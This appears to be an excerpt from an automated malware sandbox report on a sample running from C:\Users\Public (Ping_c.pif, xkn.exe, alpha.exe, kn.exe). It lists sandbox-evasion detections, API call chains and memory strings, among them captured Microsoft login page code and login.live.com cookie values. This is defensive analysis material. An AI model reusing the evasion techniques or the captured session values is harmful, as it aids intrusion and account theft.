        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
        Source: C:\Users\Public\Libraries\Ping_c.pifProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Contains functionality to detect sleep reduction / modifications
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0295CC9431_2_0295CC94
        Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
        Source: C:\Users\Public\Libraries\Ping_c.pifEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
        Powershell is started from unusual location (likely to bypass HIPS)
        Source: c:\users\public\xkn.exeKey value queried: Powershell behaviorJump to behavior
        Source: C:\Users\Public\xkn.exeMemory allocated: 223D4DD0000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\Public\xkn.exeMemory allocated: 223D4E20000 memory reserve | memory write watchJump to behavior
        Source: C:\Users\Public\xkn.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\Public\xkn.exeWindow / User API: threadDelayed 2021Jump to behavior
        Source: C:\Users\Public\xkn.exeWindow / User API: threadDelayed 968Jump to behavior
        Source: C:\Users\Public\alpha.exeAPI coverage: 6.5 %
        Source: C:\Users\Public\alpha.exeAPI coverage: 6.3 %
        Source: C:\Users\Public\alpha.exeAPI coverage: 8.6 %
        Source: C:\Users\Public\kn.exeAPI coverage: 0.8 %
        Source: C:\Windows \System32\per.exeAPI coverage: 7.1 %
        Source: C:\Users\Public\alpha.exeAPI coverage: 8.9 %
        Source: C:\Users\Public\alpha.exeAPI coverage: 9.6 %
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_0295CC9431_2_0295CC94
        Source: C:\Users\Public\xkn.exe TID: 4472Thread sleep count: 2021 > 30Jump to behavior
        Source: C:\Users\Public\xkn.exe TID: 5316Thread sleep count: 968 > 30Jump to behavior
        Source: C:\Users\Public\xkn.exe TID: 6788Thread sleep time: -1844674407370954s >= -30000sJump to behavior
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Users\Public\Libraries\Ping_c.pifLast function: Thread delayed
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,4_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,4_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,4_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,4_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exeCode function: 4_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,4_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,5_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,5_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,5_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,5_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exeCode function: 5_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,5_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,8_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,8_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,8_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,8_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exeCode function: 8_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,8_2_00007FF744F27B4C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608036F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,9_2_00007FF608036F80
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080310C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF6080310C4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608033100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,9_2_00007FF608033100
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60803234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,9_2_00007FF60803234C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FCC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,9_2_00007FF607FCC6F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF6080319F8 #359,FindFirstFileW,FindNextFileW,FindClose,9_2_00007FF6080319F8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608031B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,9_2_00007FF608031B04
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDDBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,9_2_00007FF607FDDBC0
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FD5E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,9_2_00007FF607FD5E58
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,9_2_00007FF607FDB3D8
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607F9D440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF607F9D440
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF607FDD4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,9_2_00007FF607FDD4A4
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF608013674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,9_2_00007FF608013674
        Source: C:\Users\Public\Libraries\Ping_c.pifCode function: 31_2_029458B4 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,31_2_029458B4
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,35_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,35_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,35_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,35_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exeCode function: 35_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,35_2_00007FF744F27B4C
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F1823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,38_2_00007FF744F1823C
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F12978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,38_2_00007FF744F12978
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F035B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,38_2_00007FF744F035B8
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F01560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,38_2_00007FF744F01560
        Source: C:\Users\Public\alpha.exeCode function: 38_2_00007FF744F27B4C FindFirstFileW,FindNextFileW,FindClose,38_2_00007FF744F27B4C
        Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF60801511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,9_2_00007FF60801511C
        Source: C:\Users\Public\xkn.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: Ping_c.pif, 0000001F.00000003.2080003619.0000000027203000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: techange=function(){"loaded"===s.readyState?setTimeout(function(){h(e,o,a,s)},500):"complete"===s.readyState&&h(e,o,a,s)},t(s),r("[$Loader]: Loading '"+(i.srcPath||"")+"', id:"+(i.id||""))}else o&&o()}var p=e(),y=p.slMaxRetry||2,m=p.loader||{},x=m.cdnRoots||[],L=m.tenantBrandingCdnRoots||[],R=this,b=[];R.retryOnError=!0,R.successMessage="Loaded",R.failMessage="Error",R.Add=function(e,r,t,n,o,a){e&&b.push({srcPath:e,id:r,retry:n||0,integrity:t,tagName:o||"script",onSuccess:a})},R.AddForReload=function(e,r){var t=e.src||e.href||"";R.Add(t,"AddForReload",e.integrity,1,e.tagName,r)},R.AddIf=function(e,r,t){e&&R.Add(r,t)},R.Load=function(e,r){v(0,e,r)}}var c,f,l=window,g=l.document,h=".css";u.On=function(e,r,t){if(!e)throw"The target element must be provided and cannot be null.";r?u.OnError(e,t):u.OnSuccess(e,t)},u.OnSuccess=function(e,t){if(!e)throw"The target element must be provided and cannot be null.";if(d(e))return u.OnError(e,t);var n=e.src||e.href||"",o=a(),s=i();r("[$Loader]: Loaded",e);var c=new u;c.failMessage="Reload Failed",c.successMessage="Reload Success",c.Load(null,function(){if(o)throw"Unexpected state. ResourceLoader.Load() failed despite initial load success. ['"+n+"']";s&&(document.location.href="/error.aspx?err=504")})},u.OnError=function(e,t){var n=e.src||e.href||"",o=a(),s=i();if(!e)throw"The target element must be provided and cannot be null.";r("[$Loader]: Failed",e);var d=new u;d.failMessage="Reload Failed",d.successMessage="Reload Success",d.AddForReload(e,t),d.Load(null,function(){if(o)throw"Failed to load external resource ['"+n+"']";s&&(document.location.href="/error.aspx?err=504")}),u._ReportFailure(0,n)},u._ReportFailure=function(e,r){if(s()&&!t())throw"[Retry "+e+"] Failed to load external resource ['"+r+"'], reloading from fallback CDN endpoint"},l.$Loader=u}()}]));</script><link rel="shortcut icon" href="https://logincdn.msftauth.net/16.000.30359.3/images/favicon.ico" /><style type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:none;}</style><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">if (top != self){try{top.location.replace(self.location.href);}catch (e){}}else{document.write(unescape('%3C%73') + 'tyle type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:block !important;}</style>');}</script><noscript><s
        Source: Ping_c.pif, 0000001F.00000003.2113083147.00000000271E6000.00000004.00000020.00020000.00000000.sdmp, Ping_c.pif, 0000001F.00000003.2112272992.00000000007B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OParams=11O.DmbE6iB7bsObsYNe1rkdqKpK5u71BKXaBxnzE*iqOdHncPifdWCtADVQbsse*dEOtiSePZb16T0Mp2hBZt*6G4nBRjJN0b3TqYcHpU7LBSn7g2cREEdPI5PXqS1yRdICCpcsyMYaYuuv1nD!A*d98!f4AWtQnlhL1Cx!5QX30DmM!NA74edz28VzEu5yfrBGmci29euBlEc8wyGeFnjjPA0!XThoCBFYdSytcZfxmKUfi*W3H9!rYQEvStLyOsa18mtxpSXodi3XjZa*hBDnv9Ke7mMFqeMua!CIP!U9E6ZngHeqNhzVHLviM0MpycrE0uiUtresalR6EptRKIlz2oTSPj3yB8u2e6IfL9XvqF7Kr0WB!5*0xMdd34WM1id5bg$$; domain=login.live.com; Secure; path=/; SameSite=None; HttpOnly
        Source: Ping_c.pif, 0000001F.00000003.2019992136.0000000027215000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <base href="https://login.live.com"/><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">try{document&&document.addEventListener&&(document.addEventListener("load",(function(e){e.target&&"handle-error-tag"===e.target.className&&$Loader.On(e.target)}),!0),document.addEventListener("error",(function(e){e.target&&"handle-error-tag"===e.target.className&&$Loader.On(e.target,!0)}),!0))}catch(e){}</script><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">var PROOF = {};PROOF.Type = {SQSA: 6, CSS: 5, DeviceId: 4, Email: 1, AltEmail: 2, SMS: 3, HIP: 8, Birthday: 9, TOTPAuthenticator: 10, RecoveryCode: 11, StrongTicket: 13, TOTPAuthenticatorV2: 14, UniversalSecondFactor: 15, SecurityKey: 18, Voice: -3};</script><noscript><meta http-equiv="Refresh" content="0; URL=https://login.live.com/jsDisabled.srf?mkt=EN-US&lc=1033&uaid=f8f700404dd64de990b5afe28ef7290a"/>Microsoft account requires JavaScript to sign in. This web browser either does not support JavaScript, or scripts are being blocked.<br /><br />To find out whether your browser supports JavaScript, or to allow scripts, see the brows
        Source: Ping_c.pif, 0000001F.00000003.2012764000.000000002722B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: and cannot be null.";r?u.OnError(e,t):u.OnSuccess(e,t)},u.OnSuccess=function(e,t){if(!e)throw"The target element must be provided and cannot be null.";if(d(e))return u.OnError(e,t);var n=e.src||e.href||"",o=a(),s=i();r("[$Loader]: Loaded",e);var c=new u;c.failMessage="Reload Failed",c.successMessage="Reload Success",c.Load(null,function(){if(o)throw"Unexpected state. ResourceLoader.Load() failed despite initial load success. ['"+n+"']";s&&(document.location.href="/error.aspx?err=504")})},u.OnError=function(e,t){var n=e.src||e.href||"",o=a(),s=i();if(!e)throw"The target element must be provided and cannot be null.";r("[$Loader]: Failed",e);var d=new u;d.failMessage="Reload Failed",d.successMessage="Reload Success",d.AddForReload(e,t),d.Load(null,function(){if(o)throw"Failed to load external resource ['"+n+"']";s&&(document.location.href="/error.aspx?err=504")}),u._ReportFailure(0,n)},u._ReportFailure=function(e,r){if(s()&&!t())throw"[Retry "+e+"] Failed to load external resource ['"+r+"'], reloading from fallback CDN endpoint"},l.$Loader=u}()}]));</script><link rel="shortcut icon" href="https://logincdn.msftauth.net/16.000.30359.3/images/favicon.ico" /><style type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:none;}</style><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">if (top != self){try{top.location.replace(self.location.href);}catch (e){}}else{document.write(unescape('%3C%73') + 'tyle type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:block !important;}</style>');}</script><noscript><style type="text/css" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">body{display:block !important;}</style></noscript><script type="text/javascript" nonce="ankZ9F1ILyfQemuNEsDWzEIT1m6mT9CFX0J0Ov6QmxY=">!function(e,r){for(var t in r)e[t]=r[t]}(this,function(e){function r(n){if(t[n])return t[n].exports;var i=t[n]={exports:{},id:n,loaded:!1};return e[n].call(i.exports,i,i.exports,r),i.loaded=!0,i.exports}var t={};return r.m=e,r.c=t,r.p="",r(0)}([function(e,r){var t=window,n=t.navigator;t.g_iSRSFailed=0,t.g_sSRSSuccess="",r.SRSRetry=function(e,r,i,s,a){var o=1,c=unescape("%3Cscript type='text/javascript'");a&&(c+=" crossorigin='anonymous' integrity='"+a+"'"),c+=" src='";var u=unescape("'%3E%3C/script%3E"),S=r;if(n&&n.userAgent&&s&&s!==r){var d=n.userAgent.toLowerCase(),p=d.indexOf("edge")>=0;if(!p){var f=d.match(/chrome\/([0-9]+)\./),g=f&&2===f.length&&!isNaN(f[1])&&parseInt(f[1])>54;g&&(S=s)}}t.g_sSRSSuccess.indexOf(e)===-1&&("undefined"==typeof t[e]?(t.g_iSRSFailed=1,i<=o&&document.write(c+S+u)):t.g_sSRSSuccess+=e+"|"+i+",")}}]));var g_dtFirstByte=new Date();var g_objPageMode = null;</script></head><body><div id="root" /><script type="text/javascript" src="https://logincdn.msftauth.net/shared/5/js/login_en_wxGybS-mFhG0b0BcVHo8Cw2.js" crossorigin="anonymous" class="handle-error-tag"/></script></body></html>
        Source: Ping_c.pif, 0000001F.00000003.2112272992.00000000007B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: {X-XSS-Protection1; mode=blockX-Content-Type-OptionsnosniffPPServerPPV: 30 H: PH1PEPF00011E99 V: 0x-ms-request-idc9c567ac-e189-4264-bd7b-44e3b889bc61x-ms-route-infoC534_BAYReferrer-Policystrict-origin-when-cross-originLink<https://lgincdnmsftuswe2.azureedge.net/>; rel=dns-prefetchLink<https://lgincdnvzeuno.azureedge.net/>; rel=dns-prefetchLink<https://logincdn.msftauth.net/>; rel=dns-prefetchLink<https://logincdn.msauth.net/>; rel=dns-prefetchLink<https://acctcdnvzeuno.azureedge.net/>; rel=dns-prefetchLink<https://acctcdnmsftuswe2.azureedge.net/>; rel=dns-prefetchLink<https://acctcdn.msftauth.net/>; rel=dns-prefetchLink<https://acctcdn.msauth.net/>; rel=dns-prefetchLink<https://acctcdn.msftauth.net>; rel=preconnect; crossoriginLink<https://acctcdn.msauth.net>; rel=preconnect; crossoriginLink<https://logincdn.msftauth.net>; rel=preconnect; crossoriginX-DNS-Prefetch-ControlonPersistent-AuthWWW-AuthenticateVaryOParams=11O.DmbE6iB7bsObsYNe1rkdqKpK5u71BKXaBxnzE*iqOdHncPifdWCtADVQbsse*dEOtiSePZb16T0Mp2hBZt*6G4nBRjJN0b3TqYcHpU7LBSn7g2cREEdPI5PXqS1yRdICCpcsyMYaYuuv1nD!A*d98!f4AWtQnlhL1Cx!5QX30DmM!NA74edz28VzEu5yfrBGmci29euBlEc8wyGeFnjjPA0!XThoCBFYdSytcZfxmKUfi*W3H9!rYQEvStLyOsa18mtxpSXodi3XjZa*hBDnv9Ke7mMFqeMua!CIP!U9E6ZngHeqNhzVHLviM0MpycrE0uiUtresalR6EptRKIlz2oTSPj3yB8u2e6IfL9XvqF7Kr0WB!5*0xMdd34WM1id5bg$$; domain=login.live.com; Secure; path=/; SameSite=None; HttpOnlyMSPOK=$uuid-79f7c540-2344-4ca1-b180-b58fdf332a00; domain=login.live.com; Secure; path=/; SameSite=None; HttpOnlyMSCC=8.46.123.33-US; expires=Thu, 16-Oct-2025 14:23:12 GMT; domain=login.live.com; Secure; path=/; SameSite=None; HttpOnlyMSPRequ=id=250206&lt=1726928592&co=1; domain=login.live.com; Secure; path=/; 